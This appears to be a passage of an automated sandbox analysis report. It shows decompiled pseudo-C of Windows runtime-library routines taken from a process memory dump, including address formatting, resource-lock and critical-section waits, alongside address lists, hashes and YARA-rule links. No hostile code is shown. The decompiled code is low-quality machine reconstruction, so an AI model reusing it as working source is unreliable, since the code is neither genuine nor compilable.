                                                        0x00ba22fa
                                                        0x00ba2305
                                                        0x00ba2314
                                                        0x00ba2319
                                                        0x00ba231a
                                                        0x00ba231d
                                                        0x00ba2320
                                                        0x00ba2323
                                                        0x00ba2323
                                                        0x00ba2328
                                                        0x00ba232d
                                                        0x00ba232f
                                                        0x00ba2331
                                                        0x00ba2336
                                                        0x00ba2336
                                                        0x00ba233b
                                                        0x00ba233d
                                                        0x00ba2350
                                                        0x00ba2351
                                                        0x00ba2356
                                                        0x00ba2359
                                                        0x00ba2359
                                                        0x00ba235b
                                                        0x00ba235d
                                                        0x00b65367
                                                        0x00b6536b
                                                        0x00b65372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba2363
                                                        0x00ba2363
                                                        0x00ba2369
                                                        0x00ba236a
                                                        0x00ba236c
                                                        0x00ba2371
                                                        0x00ba2373
                                                        0x00000000
                                                        0x00ba2379
                                                        0x00ba2379
                                                        0x00ba237a
                                                        0x00ba237f
                                                        0x00ba237f
                                                        0x00ba2385
                                                        0x00ba2386
                                                        0x00ba2389
                                                        0x00ba238e
                                                        0x00ba2390
                                                        0x00b65378
                                                        0x00b6537c
                                                        0x00ba2396
                                                        0x00ba2396
                                                        0x00ba2397
                                                        0x00ba239c
                                                        0x00ba23a2
                                                        0x00ba23a3
                                                        0x00ba23a6
                                                        0x00ba23ab
                                                        0x00ba23ad
                                                        0x00000000
                                                        0x00ba23b3
                                                        0x00ba23b3
                                                        0x00ba23b4
                                                        0x00ba23b9
                                                        0x00ba23ba
                                                        0x00ba23ba
                                                        0x00ba23bc
                                                        0x00ba23bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00b99153
                                                        0x00b99158
                                                        0x00b9915a
                                                        0x00b9915e
                                                        0x00b99160
                                                        0x00000000
                                                        0x00b99166
                                                        0x00b99166
                                                        0x00b99171
                                                        0x00b99176
                                                        0x00b99176
                                                        0x00000000
                                                        0x00b99160
                                                        0x00ba23c6
                                                        0x00ba23ce
                                                        0x00ba23d7
                                                        0x00ba23d7
                                                        0x00ba23ad
                                                        0x00ba2390
                                                        0x00ba2373
                                                        0x00ba233f
                                                        0x00ba233f
                                                        0x00000000
                                                        0x00ba233f
                                                        0x00ba2291
                                                        0x00ba2291
                                                        0x00ba2293
                                                        0x00ba2295
                                                        0x00ba229a
                                                        0x00ba22a1
                                                        0x00ba22a3
                                                        0x00ba22a7
                                                        0x00ba22a9
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22ab
                                                        0x00ba22ad
                                                        0x00ba22af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22af
                                                        0x00ba22b1
                                                        0x00ba22b4
                                                        0x00ba22b4
                                                        0x00ba22b6
                                                        0x00b653be
                                                        0x00b653be
                                                        0x00b653be
                                                        0x00b653c0
                                                        0x00000000
                                                        0x00000000
                                                        0x00b653cb
                                                        0x00b653ce
                                                        0x00b653d0
                                                        0x00b653d4
                                                        0x00b653d6
                                                        0x00000000
                                                        0x00b653d8
                                                        0x00b653e3
                                                        0x00b653ea
                                                        0x00b653ea
                                                        0x00000000
                                                        0x00b653d6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22b6
                                                        0x00000000
                                                        0x00ba228f
                                                        0x00ba2349
                                                        0x00ba234d
                                                        0x00ba2251
                                                        0x00ba2251
                                                        0x00000000
                                                        0x00ba2251
                                                        0x00ba21a4
                                                        0x00ba21a4
                                                        0x00ba21a6
                                                        0x00ba21a8
                                                        0x00ba21ac
                                                        0x00ba21b6
                                                        0x00ba21b8
                                                        0x00ba21bc
                                                        0x00ba21be
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba21c0
                                                        0x00ba21c2
                                                        0x00ba21c4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba21c4
                                                        0x00ba21c6
                                                        0x00ba21c6
                                                        0x00ba21c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba21c8
                                                        0x00ba21a2
                                                        0x00000000
                                                        0x00ba2183
                                                        0x00b8057b
                                                        0x00b8057d
                                                        0x00b80581
                                                        0x00b80583
                                                        0x00ba2178
                                                        0x00000000
                                                        0x00b80589
                                                        0x00b8058f
                                                        0x00b8058f
                                                        0x00b80583
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BA2206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 11001be3ece9dacbb97872bbf7829fe4a24a2c44ac2975a09b936c8b440b9f47
                                                        • Instruction ID: a7caabe5570d2202f66f74593141e0a2203afa546c32e10283c65fdb73b131d6
                                                        • Opcode Fuzzy Hash: 11001be3ece9dacbb97872bbf7829fe4a24a2c44ac2975a09b936c8b440b9f47
                                                        • Instruction Fuzzy Hash: A2510635B042116FEF149B18CC81FA673E9EF95720F2142A9FD55EB286DA61EC4187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E00B814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xc22088; // 0x76fbb2c1
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00B77707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00B813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00B77707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00B77707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00B42340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00B4E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                        0x00b814c0
                                                        0x00b814cb
                                                        0x00b814d2
                                                        0x00b814d6
                                                        0x00b814da
                                                        0x00b814de
                                                        0x00b814e3
                                                        0x00b8157a
                                                        0x00b8157a
                                                        0x00b814f1
                                                        0x00b814f3
                                                        0x00baea0f
                                                        0x00000000
                                                        0x00baea15
                                                        0x00000000
                                                        0x00baea15
                                                        0x00b814f9
                                                        0x00b814f9
                                                        0x00b814fe
                                                        0x00b81504
                                                        0x00baea1a
                                                        0x00baea1f
                                                        0x00baea21
                                                        0x00baea22
                                                        0x00baea27
                                                        0x00baea2a
                                                        0x00baea2a
                                                        0x00b81515
                                                        0x00b81517
                                                        0x00b8156d
                                                        0x00b81572
                                                        0x00b81575
                                                        0x00b81575
                                                        0x00b8151e
                                                        0x00baea50
                                                        0x00baea55
                                                        0x00baea58
                                                        0x00baea58
                                                        0x00b8152e
                                                        0x00b81531
                                                        0x00b81533
                                                        0x00000000
                                                        0x00b81535
                                                        0x00b81541
                                                        0x00b81549
                                                        0x00b81549
                                                        0x00b81533
                                                        0x00b814f3
                                                        0x00b81559

                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 00BAEA22
                                                          • Part of subcall function 00B813CB: ___swprintf_l.LIBCMT ref: 00B8146B
                                                          • Part of subcall function 00B813CB: ___swprintf_l.LIBCMT ref: 00B81490
                                                        • ___swprintf_l.LIBCMT ref: 00B8156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 39a2f9f4879e5a0294eac70a0e5438064c9fc8cc0bd766899bf7ec1a1662c120
                                                        • Instruction ID: 24da8c14b709117b394c08821b95cc1e599ea28d1d8c439ce11dd26511082cdc
                                                        • Opcode Fuzzy Hash: 39a2f9f4879e5a0294eac70a0e5438064c9fc8cc0bd766899bf7ec1a1662c120
                                                        • Instruction Fuzzy Hash: B4218F72901219ABCB20EE58CC41AEF73ECEB60700F4449A6F856E3151DB70EE59CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 45%
                                                        			E00B653A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00c201c0;
									_push(_t92);
									_push(0);
									_t37 = E00B3F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00B84FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00B93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00B93F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00BC217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00B93F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00B83915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00B65384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00B3F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00B83915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00B3F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00B83915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00B3F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00B83915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00B65329(_t74, _t92);
													_push(1);
													_t48 = E00B653A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                        0x00b653ab
                                                        0x00b653ae
                                                        0x00b653b1
                                                        0x00b653b4
                                                        0x00b653b7
                                                        0x00b805b6
                                                        0x00b805c0
                                                        0x00b805c3
                                                        0x00000000
                                                        0x00b805c9
                                                        0x00b805c9
                                                        0x00b805cc
                                                        0x00b805d5
                                                        0x00b805d5
                                                        0x00b653bd
                                                        0x00b653bd
                                                        0x00b653bd
                                                        0x00b653be
                                                        0x00b653be
                                                        0x00b653be
                                                        0x00b653c0
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba2269
                                                        0x00ba226d
                                                        0x00ba2349
                                                        0x00ba234d
                                                        0x00ba2273
                                                        0x00ba2276
                                                        0x00ba2279
                                                        0x00ba227e
                                                        0x00ba2283
                                                        0x00ba2287
                                                        0x00ba228a
                                                        0x00ba228d
                                                        0x00ba228f
                                                        0x00ba22bc
                                                        0x00ba22bc
                                                        0x00ba22bc
                                                        0x00ba22be
                                                        0x00ba22c4
                                                        0x00ba22cc
                                                        0x00ba22d0
                                                        0x00ba22d6
                                                        0x00ba22d7
                                                        0x00ba22da
                                                        0x00ba22df
                                                        0x00ba22e4
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22e6
                                                        0x00ba22e9
                                                        0x00ba22f4
                                                        0x00ba22f9
                                                        0x00ba22fa
                                                        0x00ba2305
                                                        0x00ba2314
                                                        0x00ba2319
                                                        0x00ba231a
                                                        0x00ba231d
                                                        0x00ba2320
                                                        0x00ba2323
                                                        0x00ba2323
                                                        0x00ba2328
                                                        0x00ba232d
                                                        0x00ba232f
                                                        0x00ba2331
                                                        0x00ba2336
                                                        0x00ba2336
                                                        0x00ba233b
                                                        0x00ba233d
                                                        0x00ba2350
                                                        0x00ba2351
                                                        0x00ba2356
                                                        0x00ba2359
                                                        0x00ba2359
                                                        0x00ba235b
                                                        0x00ba235d
                                                        0x00b65367
                                                        0x00b6536b
                                                        0x00b65372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba2363
                                                        0x00ba2363
                                                        0x00ba2369
                                                        0x00ba236a
                                                        0x00ba236c
                                                        0x00ba2371
                                                        0x00ba2373
                                                        0x00000000
                                                        0x00ba2379
                                                        0x00ba2379
                                                        0x00ba237a
                                                        0x00ba237f
                                                        0x00ba237f
                                                        0x00ba2385
                                                        0x00ba2386
                                                        0x00ba2389
                                                        0x00ba238e
                                                        0x00ba2390
                                                        0x00b65378
                                                        0x00b6537c
                                                        0x00ba2396
                                                        0x00ba2396
                                                        0x00ba2397
                                                        0x00ba239c
                                                        0x00ba23a2
                                                        0x00ba23a3
                                                        0x00ba23a6
                                                        0x00ba23ab
                                                        0x00ba23ad
                                                        0x00000000
                                                        0x00ba23b3
                                                        0x00ba23b3
                                                        0x00ba23b4
                                                        0x00ba23b9
                                                        0x00ba23ba
                                                        0x00ba23ba
                                                        0x00ba23bc
                                                        0x00ba23bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00b99153
                                                        0x00b99158
                                                        0x00b9915a
                                                        0x00b9915e
                                                        0x00b99160
                                                        0x00000000
                                                        0x00b99166
                                                        0x00b99166
                                                        0x00b99171
                                                        0x00b99176
                                                        0x00b99176
                                                        0x00000000
                                                        0x00b99160
                                                        0x00ba23c6
                                                        0x00ba23cb
                                                        0x00ba23ce
                                                        0x00ba23d7
                                                        0x00ba23d7
                                                        0x00ba23ad
                                                        0x00ba2390
                                                        0x00ba2373
                                                        0x00ba233f
                                                        0x00ba233f
                                                        0x00000000
                                                        0x00ba233f
                                                        0x00ba2291
                                                        0x00ba2291
                                                        0x00ba2293
                                                        0x00ba2295
                                                        0x00ba229a
                                                        0x00ba22a1
                                                        0x00ba22a3
                                                        0x00ba22a7
                                                        0x00ba22a9
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22ab
                                                        0x00ba22ad
                                                        0x00ba22af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22af
                                                        0x00ba22b1
                                                        0x00ba22b4
                                                        0x00ba22b4
                                                        0x00ba22b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22b6
                                                        0x00ba228f
                                                        0x00000000
                                                        0x00ba226d
                                                        0x00b653cb
                                                        0x00b653ce
                                                        0x00b653d0
                                                        0x00b653d4
                                                        0x00b653d6
                                                        0x00000000
                                                        0x00b653d8
                                                        0x00b653e3
                                                        0x00b653ea
                                                        0x00b653ea
                                                        0x00b653d6
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BA22F4
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00BA22FC
                                                        • RTL: Re-Waiting, xrefs: 00BA2328
                                                        • RTL: Resource at %p, xrefs: 00BA230B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: 04795226803d40a11de22a2c54467bed1ae3ea09657f8e4327f4ee2edc09ab4f
                                                        • Instruction ID: 59c328a0296db1369822e90fe5bfe265a233080739f0c4cadaebcd71ab0620e8
                                                        • Opcode Fuzzy Hash: 04795226803d40a11de22a2c54467bed1ae3ea09657f8e4327f4ee2edc09ab4f
                                                        • Instruction Fuzzy Hash: 1E5128716007026BDF24EB28CC81FA673E8EF55B60F2042A9FD45DB281E665ED41C7A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 51%
                                                        			E00B6EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00B5DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xc2793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00B416C0(_t39);
				} else {
					_t40 = E00B3F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00B83915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00B401A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xc2793c; // 0x0
								_push(_t85);
								_t44 = E00B41F28(_t71);
							} else {
								_t44 = E00B3F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00B83915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00BC2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00B6EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00B84FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00B93F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00B93F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xc220c0;
								if(_t85 != 0xc220c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00BC217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00B93F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                        0x00b6ec56
                                                        0x00b6ec56
                                                        0x00b6ec56
                                                        0x00b6ec5c
                                                        0x00b6ec64
                                                        0x00ba23e6
                                                        0x00ba23eb
                                                        0x00ba23eb
                                                        0x00b6ec6a
                                                        0x00b6ec6c
                                                        0x00b6ec6f
                                                        0x00ba23f3
                                                        0x00ba23f8
                                                        0x00ba23fa
                                                        0x00ba23fc
                                                        0x00b6ec75
                                                        0x00b6ec76
                                                        0x00b6ec76
                                                        0x00b6ec7b
                                                        0x00b6ec7c
                                                        0x00b6ec7e
                                                        0x00ba2406
                                                        0x00ba2407
                                                        0x00ba240c
                                                        0x00ba240d
                                                        0x00ba240d
                                                        0x00ba240d
                                                        0x00ba2414
                                                        0x00ba2417
                                                        0x00ba241e
                                                        0x00ba2435
                                                        0x00ba2438
                                                        0x00ba243c
                                                        0x00ba243f
                                                        0x00ba2442
                                                        0x00ba2443
                                                        0x00ba2446
                                                        0x00ba2449
                                                        0x00ba2453
                                                        0x00ba2455
                                                        0x00ba245b
                                                        0x00ba245b
                                                        0x00b6eb99
                                                        0x00b6eb99
                                                        0x00b6eb9c
                                                        0x00b6eb9d
                                                        0x00b6eb9f
                                                        0x00b6eba2
                                                        0x00ba2465
                                                        0x00ba246b
                                                        0x00ba246d
                                                        0x00b6eba8
                                                        0x00b6eba9
                                                        0x00b6eba9
                                                        0x00b6ebae
                                                        0x00b6ebb3
                                                        0x00b6ebb9
                                                        0x00b6ebbb
                                                        0x00ba2513
                                                        0x00ba2514
                                                        0x00ba2519
                                                        0x00ba251b
